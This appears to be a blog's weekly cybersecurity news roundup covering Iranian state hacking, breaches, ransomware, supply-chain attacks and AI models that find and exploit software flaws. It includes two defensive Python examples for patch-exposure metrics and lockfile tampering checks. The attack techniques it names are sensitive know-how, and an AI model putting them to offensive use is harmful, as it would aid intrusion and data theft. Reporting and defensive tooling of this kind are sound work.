Cybersecurity Saturday

From the Iranian War front,

  • Dark Reading reports,
    • With the US and Iran having reached a fragile ceasefire this week, security researchers and executives are left wondering whether there will be a commensurate pause in the cyberwarfare that has ramped up around the war.
    • The day after the temporary truce was announced, Iran’s most high-profile false-flag hacktivist operation, Handala, offered that it would participate in a temporary pause in hostilities. But even if one takes that group at its word, history suggests that ceasefires rarely stop or slow cyberactivity surrounding kinetic wars. In fact, in the absence of more effective ways of fighting, cyberattacks tend to flare significantly.
    • “Historical data and recent intelligence analysis indicate that a military ceasefire rarely equates to a ‘digital stand-down,’” warns Austin Warnick, director of Flashpoint’s National Security Intelligence Team. Instead, he tells Dark Reading, “Cyber operations often remain steady or even flare up as an asymmetric pressure valve while kinetic hostilities are paused.”
  • Cyberscoop adds,
    • “The fallout and potential exposure from Iran’s state-backed targeting of U.S. critical infrastructure extends to more than 5,200 internet-connected devices, researchers at Censys said in a threat intelligence brief Wednesday [April 8]. 
    • “Of the programmable logic controllers manufactured by Rockwell Automation/Allen-Bradley that Censys identified as potentially exposed to Iranian government attackers, nearly 3,900, or about 3 out of every 4, are based in the United States. 
    • “The cybersecurity firm identified the devices based on details multiple federal agencies shared in a joint alert Tuesday, and published additional indicators of compromise, including operator IPs and other threat hunting queries.
    • “Federal authorities earlier this week warned that Iranian government attackers have exploited devices that control industrial automation processes and disrupted multiple sectors during the past month. Some victims also experienced financial losses as a result of the attacks, officials said.” 
  • MedTech Dive tells us,
    • “Stryker is now fully operational after a[n Iranian] cyberattack took down its manufacturing, ordering and shipping operations.
    • “The medtech company’s global manufacturing and commercial, ordering and distribution systems have been fully restored, according to a Thursday [April 9] filing with the Securities and Exchange Commission.
    • “Stryker said that the attack had a material impact on its operations, which will affect the company’s financial results for the first quarter of 2026. However, Stryker does not expect a material impact on its full-year guidance of 8% to 9.5% organic sales growth and adjusted earnings per share of $14.90 to $15.10.
    • “The company did not detail the expected financial impact on the first quarter.”

From the cybersecurity policy and law enforcement front,

  • The Wall Street Journal reports,
    • “Top White House officials are racing to address potential cybersecurity threats posed by the latest artificial-intelligence models, highlighting how AI’s perils are becoming a top priority for the Trump administration.
    • National Cyber Director Sean Cairncross is leading the administration’s response, convening officials across agencies to identify security weaknesses in critical infrastructure and bolster government systems that could be exploited by AI, people familiar with the matter said. The administration is working with the private sector to make sure Americans are safe when new models are released, White House officials said.
    • “In recent days, the administration has held discussions featuring Vice President JD Vance and Treasury Secretary Scott Bessent with leading tech and financial executives about coordinating the private sector’s response to potential cyberattacks and preparing online systems, the people said. 
    • “The moves come during an intensifying race among the top AI companies to release more powerful models that could cause widespread online disruptions if put to work by bad actors. 
    • Anthropic said this week its new AI model Mythos was so good at finding and exploiting software bugs that the company has no plans to release it to the general public. Instead, Anthropic has made a preview version of the model available to roughly 50 companies and organizations that run critical infrastructure, including leading tech companies such as Apple, Amazon.com and Google. The aim is to find and fix bugs in hardware and software before the model is publicly released. 
    • “The company has also held discussions with government officials about the model’s cyber capabilities. 
    • “OpenAI and other model developers are also expected to release powerful tools in the weeks ahead.” 
  • and
    • “Over the past six months, cybersecurity researchers have become increasingly worried that AI systems are not only becoming better at finding bugs, but that they are also shrinking the window of time between when a bug is disclosed and when it can be exploited with working attack software.
    • “Late last year, researchers at Stanford University found that AI software was almost as good as humans at finding and exploiting bugs on a real-world network. 
    • “And earlier this year Anthropic’s Claude Opus 4.6 model found more high-severity bugs in the Firefox browser in two weeks than the rest of the world typically reports in two months. 
    • When measuring dollar cost to find a bug, Mythos is about 10 times as efficient as previous AI models, Graham said. Details of Mythos’s capabilities were previously reported by Fortune.”
  • HIPAA Journal lets us know,
    • “To help HIPAA-regulated entities manage risks and vulnerabilities, OCR has recorded a risk management video. In the video, Nicholas Heesters, OCR’s Senior Advisor for Cybersecurity, explains the HIPAA risk management requirements and provides examples of potential risk management violations identified during OCR’s investigations of data breaches.
    • “In December 2025, OCR requested questions from HIPAA-regulated entities on risk management, and has provided answers to a selection of those questions in the video. The video also shares important resources to help HIPAA-regulated entities comply with this important HIPAA Security Rule requirement. You can view the video on OCR’s YouTube channel.”
  • Cybersecurity Dive relates,
    • “The Justice Department on Tuesday [April 7] announced that it had stopped Russia’s military intelligence agency from using hacked U.S. routers to maliciously redirect internet traffic and steal data from victims that include governments and critical infrastructure operators.
    • “Operatives of the Russian GRU have spent several years breaking into TP-Link small office and home office (SOHO) routers around the world and reconfiguring them to send DNS requests through Kremlin-controlled servers, which allowed Moscow to collect internet traffic and even passwords, emails and other sensitive information from victim networks. In response, the FBI launched “Operation Masquerade,” sending commands to hacked routers that collected forensic data and reset their DNS settings to erase Russia’s foothold in the devices.
    • DOJ announced the operation hours after Microsoft revealed Russia’s abuse of SOHO routers. “For nation-state actors like Forest Blizzard,” Microsoft said, “DNS hijacking enables persistent, passive visibility and reconnaissance at scale.”

From the cybersecurity breaches and vulnerabilities front,

  • Bleeping Computer reports,
    • “Bitcoin Depot, which operates one of the largest Bitcoin ATM networks, says attackers stole $3.665 million worth of Bitcoin from its crypto wallets after breaching its systems last month.
    • “The company manages more than 25,000 Bitcoin ATMs and BDCheckout locations worldwide and reported revenue of $615 million in 2025.
    • “As revealed in a filing with the U.S. Securities and Exchange Commission, the company discovered the attack on March 23 after detecting suspicious activity on some of its IT systems.”
    • “While it took immediate measures to contain the breach, the attackers had time to steal credentials to digital asset settlement accounts and transfer over 50 Bitcoin from Bitcoin Depot’s wallets before their access was blocked.”
  • Dark Reading discusses how “Russia’s ‘Fancy Bear’ APT Continues Its Global Onslaught.”
    • “Victims don’t need to match the cyber espionage group’s technical sophistication, experts say. But patching and some form of zero trust are now non-negotiable.”
  • The Cybersecurity and Infrastructure Security Agency added two known exploited vulnerabilities to its catalog this week.
  • Bleeping Computer advises,
    • “Analysis of CISA’s Known Exploited Vulnerabilities over the past four years shows critical vulnerabilities still open at Day 7 worsened from 56% to 63% despite teams closing 6.5x more tickets. Staffing cannot solve this.
    • “Of the 52 tracked weaponized vulnerabilities in our study, 88% were patched more slowly than they were exploited — half were weaponized before any patch existed.
    • “The problem is not speed. It is the operational model itself.
    • “Cumulative exposure, not CVE counts, is the true risk metric that security teams now need to measure. While dashboards reward the sprint to get patches implemented, breaches exploit the tail. AI is not another attack surface — instead, the transition period where AI-powered attackers face human defenders is the industry’s most dangerous window.
    • “In response, defenders have to implement their own autonomous, closed-loop risk operations.”
  • and tells us,
    • “Attackers have been exploiting a zero-day vulnerability in Adobe Reader using maliciously crafted PDF documents since at least December.
    • “The attacks have been discovered by security researcher Haifei Li (the founder of the sandbox-based exploit-detection platform EXPMON), who warned on Tuesday that the attackers are using what he described as a “highly sophisticated, fingerprinting-style PDF exploit” to target an undisclosed Adobe Reader security flaw.
    • “Li also said that these attacks have been targeting Adobe users for at least 4 months, stealing data from compromised systems using privileged util.readFileIntoStream and RSS.addFeed Acrobat APIs, and deploying additional exploits.
    • “This ‘fingerprinting’ exploit has been confirmed to leverage a zero-day/unpatched vulnerability that works on the latest version of Adobe Reader without requiring any user interaction beyond opening a PDF file,” Li warned.
    • “Even more concerning, this exploit allows the threat actor to not only collect/steal local information but also potentially launch subsequent RCE/SBX attacks, which could lead to full control of the victim’s system.”
  • Cybersecurity Dive informs us,
    • “A cyber threat actor is using the React2Shell vulnerability as the basis for a widespread credential-harvesting campaign that has compromised everything from AI tool API keys to cloud platform passwords.
    • “After identifying internet-facing React Server Components instances that are vulnerable to React2Shell, the hackers upload a malicious payload to the server — without the need for authentication — that lets them execute arbitrary code on the target server, researchers at Cisco’s Talos threat intelligence group said in a recent report.
    • “The payload contains a “multi-phase credential harvesting tool that harvests credentials, SSH keys, cloud tokens, and environment secrets at scale,” Cisco researchers wrote.
    • “The entire process after target identification is automated. “No further manual interaction is required to extract and exfiltrate credentials harvested from the system,” Cisco said.”
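
The exposure arithmetic behind the Bleeping Computer patching analysis above (open-at-Day-7 rate, share weaponized before a patch existed, and cumulative exposure instead of CVE counts), as an added worked example that is not code from Bleeping Computer or from the study it cites. The records, dates and CVE-EXAMPLE identifiers are constructed placeholders, and the exposure window (first known exploitation until our own remediation) is an assumption made here:

```python
from dataclasses import dataclass
from datetime import date
from typing import List, Optional, Tuple


@dataclass
class VulnRecord:
    """One tracked flaw; fields other than `cve` and `disclosed` may be unknown (None)."""
    cve: str                          # placeholder identifier, constructed for this example
    disclosed: date                   # public disclosure date
    exploited: Optional[date]         # first known in-the-wild exploitation, or None
    patch_available: Optional[date]   # vendor fix published, or None if no patch exists
    remediated: Optional[date]        # date our fleet was fully patched/mitigated, or None


def still_open_at_day(records: List[VulnRecord], day: int) -> float:
    """Fraction of flaws not remediated within `day` days of disclosure (the 'Day 7' figure)."""
    if not records:
        return 0.0
    late = sum(1 for r in records
               if r.remediated is None or (r.remediated - r.disclosed).days > day)
    return late / len(records)


def weaponized_before_patch(records: List[VulnRecord]) -> float:
    """Share of exploited flaws that were exploited before any vendor patch existed."""
    exploited = [r for r in records if r.exploited is not None]
    if not exploited:
        return 0.0
    hits = sum(1 for r in exploited
               if r.patch_available is None or r.exploited < r.patch_available)
    return hits / len(exploited)


def patched_slower_than_exploited(records: List[VulnRecord]) -> float:
    """Share of exploited flaws where our remediation landed after exploitation began."""
    exploited = [r for r in records if r.exploited is not None]
    if not exploited:
        return 0.0
    hits = sum(1 for r in exploited
               if r.remediated is None or r.remediated > r.exploited)
    return hits / len(exploited)


def exposure_days(r: VulnRecord, as_of: date) -> int:
    """Days a flaw was exploitable in our environment: from first exploitation until
    remediation, or until `as_of` if still open. Unexploited flaws contribute 0."""
    if r.exploited is None:
        return 0
    end = r.remediated if r.remediated is not None else as_of
    return max(0, (end - r.exploited).days)


def cumulative_exposure_days(records: List[VulnRecord], as_of: date) -> int:
    """The metric the passage argues for: total exploitable-days across the tracked set,
    rather than a count of CVEs or closed tickets."""
    return sum(exposure_days(r, as_of) for r in records)


def exposure_tail(records: List[VulnRecord], as_of: date) -> List[Tuple[str, int]]:
    """(cve, exposure_days) sorted largest first, so the long tail is visible."""
    pairs = [(r.cve, exposure_days(r, as_of)) for r in records]
    return sorted(pairs, key=lambda p: p[1], reverse=True)


# Constructed sample data; every date and identifier below is made up for illustration.
AS_OF = date(2026, 4, 11)
SAMPLE_RECORDS = [
    # Exploited two days before disclosure; we remediated a week after disclosure.
    VulnRecord("CVE-EXAMPLE-0001", date(2026, 1, 5), date(2026, 1, 3), date(2026, 1, 10), date(2026, 1, 12)),
    # Never exploited and closed quickly: a closed ticket that adds no exposure.
    VulnRecord("CVE-EXAMPLE-0002", date(2026, 2, 1), None, date(2026, 2, 1), date(2026, 2, 3)),
    # Remediated before exploitation started: zero exposure even though it was exploited later.
    VulnRecord("CVE-EXAMPLE-0003", date(2026, 2, 10), date(2026, 2, 20), date(2026, 2, 10), date(2026, 2, 15)),
    # Patch exists, exploitation ongoing, still unremediated: this is the tail breaches exploit.
    VulnRecord("CVE-EXAMPLE-0004", date(2026, 3, 1), date(2026, 3, 5), date(2026, 3, 3), None),
]

if __name__ == "__main__":
    print(f"open at day 7: {still_open_at_day(SAMPLE_RECORDS, 7):.0%}")
    print(f"weaponized before patch: {weaponized_before_patch(SAMPLE_RECORDS):.0%}")
    print(f"patched slower than exploited: {patched_slower_than_exploited(SAMPLE_RECORDS):.0%}")
    print(f"cumulative exposure days: {cumulative_exposure_days(SAMPLE_RECORDS, AS_OF)}")
    for cve, days in exposure_tail(SAMPLE_RECORDS, AS_OF):
        print(f"  {cve}: {days}d")
```

Note that two records with identical ticket counts contribute very different exposure: the unremediated one dominates the total, which is the point the passage makes about the tail.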

From the ransomware front,

  • The American Hospital Association reports,
    • “Health care and public health was the top sector targeted for cyberthreats in 2025, according to the FBI’s latest annual report on internet crimes. There were 460 ransomware attacks and 182 data breaches, totaling 642 cyber events. Financial services was the next highest sector at 447 total events. 
    • “This report quantifies what we already knew anecdotally about the health care sector being the most targeted by ransomware attacks,” said John Riggi, AHA national advisor for cybersecurity and risk. “The vast majority are perpetrated by foreign ransomware gangs, primarily Russian-speaking groups, which specifically target health care hoping for a big payout. They know these attacks cause disruptions and delays to digitally dependent health care delivery, posing a risk to patient and community safety, thereby increasing the exigency and pressure for a potentially large ransom payment. These despicable acts are in fact threat-to-life crimes and remind us to do what we can on defense and prepare for clinical continuity not if, but when, an attack strikes.” 
  • Dark Reading relates,
    • “Storm-1175 actors are running up-tempo campaigns to deliver Medusa ransomware, putting pressure on organizations to patch critical vulnerabilities faster. 
    • “In a blog post on Monday, Microsoft Threat Intelligence detailed how Storm-1175, a financially motivated cybercrime group, is conducting “high velocity ransomware campaigns” that typically exploit known vulnerabilities in the sweet spot for threat actors: the time between a vulnerability’s initial disclosure and the widespread adoption of the patch. Microsoft also tied the exploitation of several zero-day vulnerabilities to the group.”
    • “Storm-1175’s playbook appears to be predicated on speed. Attackers move quickly from vulnerability exploitation to data exfiltration and, finally, delivery of Medusa ransomware, “often within a few days and, in some cases, within 24 hours,” according to Microsoft.
    • “The threat actor’s high operational tempo and proficiency in identifying exposed perimeter assets have proven successful, with recent intrusions heavily impacting healthcare organizations, as well as those in the education, professional services, and finance sectors in Australia, United Kingdom, and United States,” the blog post stated.”
  • SC Media informs us,
    • “In March, more than a dozen CISOs and other security managers gathered online to discuss how best to handle ransomware in today’s AI-powered environments.
    • “Because the CyberRisk Collaborative roundtable discussion, sponsored by Akamai, followed the Chatham House rule, we can’t tell you who said what. But the latest CRC report, “Redefining Ransomware Containment,” summarizes what was said.
    • “The group’s main message: Ransomware is no longer just a cybersecurity issue, but a full-scale business-resilience challenge.
    • “Organizations should focus on ransomware recovery, the participants agreed. While rapid containment remains critical, stopping an attack is only part of the solution. True success against ransomware includes maintaining business operations, minimizing disruption, and lining up technical response with organizational priorities.
    • “Containment speed is important, but even a quickly halted attack can lead to substantial financial loss or reputational damage. Organizations must take a view of incident success that includes recovery timelines and customer impact alongside traditional security metrics. That’s because a ransomware incident affects the entire enterprise, not just IT systems.
    • “Because business continuity is the true benchmark of resilience, CISOs and other security managers in the roundtable discussion stressed that customers and stakeholders often care less about how quickly an attack is contained and more about whether services remain available.
    • “The CISOs said that as a result, leading organizations are folding ransomware response into broader business-continuity and disaster-recovery plans. That way, critical operations can keep going even during an active incident, and downstream impacts on customers, partners, and markets will be lessened.”

From the cybersecurity defenses front,

  • The Wall Street Journal reports,
    • “Artificial intelligence giant Anthropic unveiled a partnership with cybersecurity companies Tuesday [April 7] that raises more questions about how parts of the security industry may be disrupted by the emerging technology.
    • The company said its new Project Glasswing initiative allows select companies access to its Claude Mythos2 Preview frontier model, specifically for defensive cybersecurity work. Participants include CrowdStrike, Palo Alto Networks, Microsoft, Apple, Amazon’s AWS cloud business, JPMorgan Chase, Google, Broadcom, Nvidia and the Linux Foundation.
    • Anthropic said its new model already has found thousands of high-severity vulnerabilities, including some in every major operating system and web browser.
    • “AI models have reached a level of coding capability where they can surpass all but the most skilled humans at finding and exploiting software vulnerabilities,” Anthropic said of Project Glasswing.
    • “The project shows how AI is beginning to reshape parts of the cybersecurity industry, with investors trying to anticipate which areas are built to last and which are ripe to be disrupted by automation. Cyber shares rose as some investors were encouraged by the companies’ inclusion in the Anthropic project, but uncertainty remains about how AI’s impact on the industry will play out.”
  • Forrester identifies ten consequences of Project Glasswing nobody’s writing about yet.
  • SC Media offers five ways to mitigate the risks of “cracked” software.
    • “The human element remains one of the top threat vectors within organizations. Well-intentioned employees trying to get their work done quickly and efficiently can sometimes unknowingly introduce new security risks in doing so.
    • “For instance, an employee needs a PDF editor or design tool, but can’t find an IT-approved option or doesn’t want to wait for access. So they download a free or “cracked” version from the web. It feels harmless. In reality, it creates a direct path into the organization’s IT environment.” * * *
    • “Security teams can reduce this risk, but it takes a shift in focus from policy to control. Taking the following five steps won’t eliminate shadow IT, but they will make it much harder for a quick download to turn into a serious incident:
      • Block unauthorized executables at runtime: Stop unknown binaries from running, even if a user downloads them manually.
      • Restrict local admin rights: Limit who can install or modify software so a single download can’t change the system.
      • Apply a zero-trust approach to application control: Allow only approved applications to run, block everything else.
      • Use advanced endpoint protection to monitor for behavioral indicators, not just signatures: Look for patterns like manual installs, archive extraction, and unusual execution paths.
      • Reinforce acceptable use policies and user awareness: Make expectations clear and explain the risks.”
  • Here’s a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

From the Iranian war front,

  • Industrial Cyber reports,
    • “New data from KELA recognizes that Iranian state-sponsored threat actors have moved well beyond traditional espionage, increasingly blurring the line between nation-state operations and financially motivated cybercrime. Rather than running large-scale ransomware cartels of their own, these groups have embedded themselves into the existing criminal ecosystem, acting as initial access brokers, collaborating with ransomware affiliates, and deploying pseudo-ransomware to mask destructive attacks as extortion campaigns.
    • “A key example is Pay2Key, an Iran-linked ransomware operation that has resurfaced as a professionalized RaaS platform operating on the anonymous I2P network, actively recruiting affiliates from Russian cybercrime forums and offering an elevated profit share, bumping the affiliate cut from 70% to 80%, for attacks on U.S. and Israeli targets. The model creates a significant compliance risk for victim organizations: paying what appears to be a routine ransom demand could unknowingly funnel money to OFAC-sanctioned Iranian entities, exposing companies to severe legal and financial penalties.
    • “The KELA Cyber Intelligence Center identified in its Monday [March 30] post that one of the more concerning developments is the growing collaboration between Iranian state-linked actors and the broader ransomware ecosystem.”
  • Security Week relates,
    • The FBI has confirmed that threat actors have gained access to an email account belonging to FBI Director Kash Patel, but said no government information has been compromised. 
    • “The Iran-linked hacker group Handala on Friday [March 27] claimed to have hacked Patel’s email account, releasing files allegedly representing photos, emails, and classified documents taken from the FBI director’s inbox.
    • “The so-called ‘impenetrable’ systems of the FBI were brought to their knees within hours by our team,” the hackers wrote. 
    • However, the account does not appear to be hosted on FBI systems; it is a personal Gmail account. In addition, the stolen information does not seem to be recent.
    • It’s unclear when the account was hacked, but it may have been one of the many targeted by Iranian hackers back in 2024 as part of an operation targeting Donald Trump’s presidential campaign.” 
  • Cyberscoop tells us,
    • “Medtech company Stryker says it’s back to being “fully operational,” three weeks after it became the most prominent victim to date of Iranian hackers, who said they attacked the Michigan-based company in retaliation over the conflict with the United States and Israel.
    • “A March 11 wiper attack from the pro-Palestinian, Iranian government-connected group Handala damaged the company’s order processing, manufacturing and shipping.” * * *
    • “Production is moving rapidly toward peak capacity with discipline and stability, supported by restored commercial, ordering and distribution systems,” the company wrote in an update on its website Wednesday. “Overall product supply remains healthy, with strong availability across most product lines, as we continue to meet customer demand and support patient care.”
    • “Stryker said it continues to work with outside cyber experts, government agencies and industry partners on its investigation and recovery.” * * *
    • “Iranian hackers have been busy since the U.S.-Israel strikes began, but have claimed few successes in the United States. Handala boasted this week about an attack on St. Joseph County, Indiana, where officials said they were investigating a hack of its external fax service.”

From the cybersecurity policy front,

  • Cybersecurity Dive reports,
    • “President Donald Trump on Friday [April 3] proposed significantly slashing the Cybersecurity and Infrastructure Security Agency’s budget.
    • The White House’s fiscal year 2027 budget would reduce CISA’s funding by $707 million, roughly 30% of its FY2025 budget of $2.4 billion.
    • “The administration said its proposal “refocuses CISA on its core mission” of protecting federal networks and helping critical infrastructure operators defend themselves from cyberattacks and physical threats.”
  • Per a March 31 HHS news release,
    • “The U.S. Department of Health and Human Services (HHS) today announced that it is reversing a 2024 reorganization that: (1) dually titled the Office of the National Coordinator for Health Information Technology (ONC) as the Office of the Assistant Secretary for Technology Policy/Office of the National Coordinator for Health IT (ASTP/ONC), headed by the Assistant Secretary for Technology Policy, dually titled as the National Coordinator for Health IT; (2) moved three HHS-wide technology roles to ONC from the Office of the Chief Information Officer (OCIO); and (3) shifted specific cybersecurity functions out of OCIO.
    • “Today’s action restores a unified, Department‑wide technology leadership model by returning these enterprise responsibilities to OCIO while sharpening ONC’s mission focus on nationwide health IT interoperability and data liquidity.
    • “Under this alignment, HHS has ended the Biden administration’s dual management title for the Assistant Secretary for Technology Policy, restored ONC as a singularly titled office, and shifted the roles, responsibilities, and offices of the HHS Chief Technology Officer (CTO), HHS Chief Artificial Intelligence Officer (CAIO), and HHS Chief Data Officer (CDO) back under the HHS Chief Information Officer’s leadership. This structure reinforces OCIO’s statutory responsibility for enterprise IT, cybersecurity, and data operations, while enabling ONC to concentrate on health IT policy, standards, and certification that support better care and lower costs.
    • “To better integrate policy and operations, OCIO will organize enterprise roles around three core functions: (1) strategic technology leadership and innovation, led by the CTO; (2) responsible, trustworthy artificial intelligence, led by the CAIO; and (3) enterprise data governance and analytics, led by the CDO. These leaders will work as a unified team under the CIO to deliver secure, scalable platforms and common services that support ONC’s policy work and the Department’s mission programs.
    • “This structure allows OCIO to provide an integrated backbone for cloud, cybersecurity, data, and AI that every HHS component can rely on,” said HHS Chief Information Officer Clark Minor. “By bringing CTO, CAIO, and CDO functions together under one roof, we can move faster on shared platforms, protect our systems more effectively, and support ONC and the operating divisions with the technology capabilities they need to innovate for patients.”
  • Cybersecurity Dive informs us,
    • “Federal government leaders are prioritizing cybersecurity improvements as they sketch out their technology-modernization agendas for the year, consulting firm EY said in a survey released this week.
    • “Roughly half of survey respondents (56%) said cybersecurity was one of their top modernization priorities, with roughly a third saying that growing cybersecurity threats “are a barrier for their agencies to achieve their modernization goals,” the survey found.
    • “EY also presented data on government leaders’ impressions of their agencies’ current security postures and their hopes for AI.”
  • Bleeping Computer points out,
    • “The U.S. Federal Bureau of Investigation (FBI) warned Americans against using foreign-developed mobile applications, particularly those created by Chinese developers.
    • “In a public service announcement (PSA) issued via its Internet Crime Complaint Center (IC3) platform this Tuesday [March 31], the FBI warned of privacy and data security risks associated with these apps.
    • “As of early 2026, many of the most downloaded and top-grossing apps in the United States are developed and maintained by foreign companies, particularly those based in China,” the bureau warned.”

From the cybersecurity breaches and vulnerabilities front,

  • Health Exec reports on April 2,
    • “A hospital in Texas revealed that it’s fallen victim to a data breach that exposed the personal information of more than 257,000 patients to hackers.
    • “Nacogdoches Memorial Hospital—an independent health system in Texas consisting of one emergency-capable facility, several affiliated provider practices, and a rehabilitation center—made the breach public this week.
    • “The incident occurred on Jan. 31—or at least, that’s when Nacogdoches Memorial staff became aware of an ongoing cyberattack.
    • “At that time, the hospital said it notified law enforcement, initiated an “incident response plan” and began an investigation to find out what happened. As for details such as the nature of the breach and who was responsible, neither a statement from Nacogdoches Memorial nor a report filed with the Office of the Maine Attorney General contain those details.
    • “To date, no known listing of the data trove on the dark web exists, and no hacker group has claimed responsibility for the cyberattack. Whether or not the data will eventually end up leaked onto the Internet or put up for sale remains unknown—but given the scope of the breach and the black market value of the stolen information, it’s not out of the realm of possibility.”
  • Bleeping Computer relates,
    • “Telehealth giant Hims & Hers Health is warning that it suffered a data breach after support tickets were stolen from a third-party customer service platform.” * * *
    • “It is one of the most successful U.S. brands in the online pharmacy and telehealth space, with strong marketing presence, and annual revenues close to $1 billion.” * * *
    • “BleepingComputer learned last month that the ShinyHunters extortion gang conducted the breach.
    • “The data was stolen as part of a widespread campaign in which threat actors compromised Okta SSO accounts to gain access to third-party cloud storage services and SaaS platforms to steal data.
    • “In this particular attack, BleepingComputer was told that the threat actors used the Okta SSO account to access the Hims & Hers Zendesk instance, where they stole millions of support tickets.”
  • Dark Reading notes,
    • “The impact of TeamPCP’s high-profile supply chain attacks is rapidly expanding — in more ways than one.
    • “Following last month’s spree of compromised open source projects, two victim organizations disclosed breaches related to the attacks this week. On Tuesday, AI startup Mercor said on social media platform X that it was “one of thousands of companies impacted by a supply chain attack involving LiteLLM.”
    • “And on Thursday, the EU’s Computer Emergency Response Team (CERT-EU) disclosed that a recent attack on the European Commission’s cloud and Web infrastructure stemmed from the previously reported Trivy supply chain attack, also attributed to TeamPCP. According to CERT-EU, the EC inadvertently installed a compromised version of the Trivy code-scanning security tool, which allowed threat actors to harvest credentials and secrets that they later used to access the organization’s Amazon Web Services (AWS) cloud environment.”
  • The American Hospital Association News tells us,
    • “The Cybersecurity and Infrastructure Security Agency released an alert March 27 on a vulnerability in F5 BIG-IP Access Policy Manager software that is being exploited for malicious cyber activity. F5 devices and software, used widely by health care and other critical infrastructure, provide app security and management services. The vulnerability was previously disclosed in October 2025 as a denial-of-service issue but was reclassified this month due to new information that found the vulnerability allows malicious actors to perform remote code execution, according to an alert from F5. 
    • “F5 has determined that this issue is much more severe than previously thought,” said Scott Gee, AHA deputy national advisor for cybersecurity and risk. “The original patch released last year fixes the larger issue, so if you are using F5’s BIG-IP software, a very common app delivery and security service, ensure that you patch the system as soon as possible.” 
  • Cybersecurity Dive informs us,
    • “Security researchers warn that chaining two critical vulnerabilities in Progress Software’s ShareFile service could allow an attacker to achieve remote code execution.
    • “The flaws exist in ShareFile Storage Zones Controller, which helps users manage files while they are using the ShareFile software-as-a-service interface, according to researchers at watchTowr Labs.
    • “The vulnerabilities include an authentication bypass flaw, tracked as CVE-2026-2699, and a remote code execution flaw, CVE-2026-2701. The vulnerabilities have severity scores of 9.8 and 9.1, respectively.
    • “Progress Software warned in a security bulletin released Thursday [April 2] that an attacker could access on-premises Storage Zones Controller configuration pages, allowing them to make changes in system configuration or achieve remote code execution.
    • “There is no immediate evidence of exploitation, but researchers urged users to immediately apply security updates.”
  • and
    • “A North Korean threat actor is suspected to be behind a major supply chain attack against Axios, a JavaScript library that is downloaded more than 100 million times per week, according to security researchers. 
    • “Earlier this week, an attacker compromised the node package manager account for an axios maintainer and introduced a malicious dependency plain-crypto-js. The malicious versions were deleted within a few hours, but, with the widespread use of axios, there was a risk that a large number of users could have downloaded the poisoned version.
    • “Researchers from Google Threat Intelligence Group said the malicious dependency is an obfuscated dropper that deploys a backdoor called Waveshaper.v2 across Windows, Linux and Mac environments.” 
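The axios incident above is the pattern where a package a project already trusts quietly gains a new transitive dependency. The script below is an added example (not code from the article, from axios or from npm): it diffs two constructed package-lock.json snapshots, flags new packages, version or integrity changes, install scripts and non-registry sources, and reports which package pulled the newcomer in. The lockfile contents, version numbers, integrity hashes and the install-script flag on plain-crypto-js are assumptions made for the demonstration.

```python
"""Spot newly introduced or changed npm dependencies between two lockfile snapshots.

Added example, not code from the original article, axios or npm. It models the
attack described above: a package the project already trusts gains a new
transitive dependency after a maintainer account is hijacked. Both lockfiles
are constructed; versions, integrity hashes and the hasInstallScript flag on
the injected package are illustrative assumptions.
"""
import json

REGISTRY = "https://registry.npmjs.org/"


def _lock(packages):
    """Build a lockfileVersion 3 document (packages keyed by node_modules path)."""
    return json.dumps({"name": "demo-app", "lockfileVersion": 3, "packages": packages})


# Constructed baseline: the project depends on axios, which pulls in follow-redirects.
BASELINE_LOCK = _lock({
    "": {"dependencies": {"axios": "^1.0.0"}},
    "node_modules/axios": {
        "version": "1.0.0",
        "resolved": REGISTRY + "axios/-/axios-1.0.0.tgz",
        "integrity": "sha512-AAAA",
        "dependencies": {"follow-redirects": "^1.15.0"},
    },
    "node_modules/follow-redirects": {
        "version": "1.15.0",
        "resolved": REGISTRY + "follow-redirects/-/follow-redirects-1.15.0.tgz",
        "integrity": "sha512-BBBB",
    },
})

# Constructed tampered snapshot: a patch release of axios now lists plain-crypto-js,
# which in turn declares an install script (hypothetical detail for the example).
TAMPERED_LOCK = _lock({
    "": {"dependencies": {"axios": "^1.0.0"}},
    "node_modules/axios": {
        "version": "1.0.1",
        "resolved": REGISTRY + "axios/-/axios-1.0.1.tgz",
        "integrity": "sha512-CCCC",
        "dependencies": {"follow-redirects": "^1.15.0", "plain-crypto-js": "^1.0.0"},
    },
    "node_modules/follow-redirects": {
        "version": "1.15.0",
        "resolved": REGISTRY + "follow-redirects/-/follow-redirects-1.15.0.tgz",
        "integrity": "sha512-BBBB",
    },
    "node_modules/plain-crypto-js": {
        "version": "1.0.0",
        "resolved": REGISTRY + "plain-crypto-js/-/plain-crypto-js-1.0.0.tgz",
        "integrity": "sha512-DDDD",
        "hasInstallScript": True,
    },
})


def lockfile_packages(lock_text):
    """Map package name -> lockfile entry, skipping the root ("") entry."""
    data = json.loads(lock_text)
    out = {}
    for path, meta in data.get("packages", {}).items():
        if path:
            out[path.split("node_modules/")[-1]] = meta
    return out


def diff_lockfiles(before_text, after_text):
    """Return (kind, package, detail) findings worth a human look before install."""
    before, after = lockfile_packages(before_text), lockfile_packages(after_text)
    findings = []
    for name, meta in after.items():
        old = before.get(name)
        if old is None:
            findings.append(("new-package", name, meta.get("version")))
        elif old.get("version") != meta.get("version"):
            findings.append(("version-change", name,
                             f"{old.get('version')} -> {meta.get('version')}"))
        elif old.get("integrity") != meta.get("integrity"):
            # Same version string, different tarball hash: the artifact was republished.
            findings.append(("integrity-change", name, meta.get("integrity")))
        if meta.get("hasInstallScript"):
            findings.append(("install-script", name, meta.get("version")))
        if not meta.get("resolved", "").startswith(REGISTRY):
            findings.append(("non-registry-source", name, meta.get("resolved")))
    for name in before.keys() - after.keys():
        findings.append(("removed-package", name, before[name].get("version")))
    return findings


def introduced_by(lock_text, package):
    """Which packages (or the project root) declare `package` as a dependency."""
    data = json.loads(lock_text)
    parents = []
    for path, meta in data.get("packages", {}).items():
        if package in meta.get("dependencies", {}):
            parents.append(path.split("node_modules/")[-1] if path else "<root>")
    return sorted(parents)


if __name__ == "__main__":
    for finding in diff_lockfiles(BASELINE_LOCK, TAMPERED_LOCK):
        print(*finding)
    print("plain-crypto-js pulled in by:", introduced_by(TAMPERED_LOCK, "plain-crypto-js"))
```

In a pipeline, run this against the lockfile committed at the last known-good revision and the one a fresh install produces; anything in the output is a reason to pause before install scripts run. It checks structure, not content: a poisoned release of a package that was already present shows up only as a version or integrity change, so those findings deserve the same attention as a brand-new package.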
  • Bleeping Computer notes,
    • “Threat actors are exploiting the recent Claude Code source code leak by using fake GitHub repositories to deliver Vidar information-stealing malware.
    • “Claude Code is a terminal-based AI agent from Anthropic, designed to execute coding tasks directly in the terminal and act as an autonomous agent, capable of direct system interaction, LLM API call handling, MCP integration, and persistent memory.
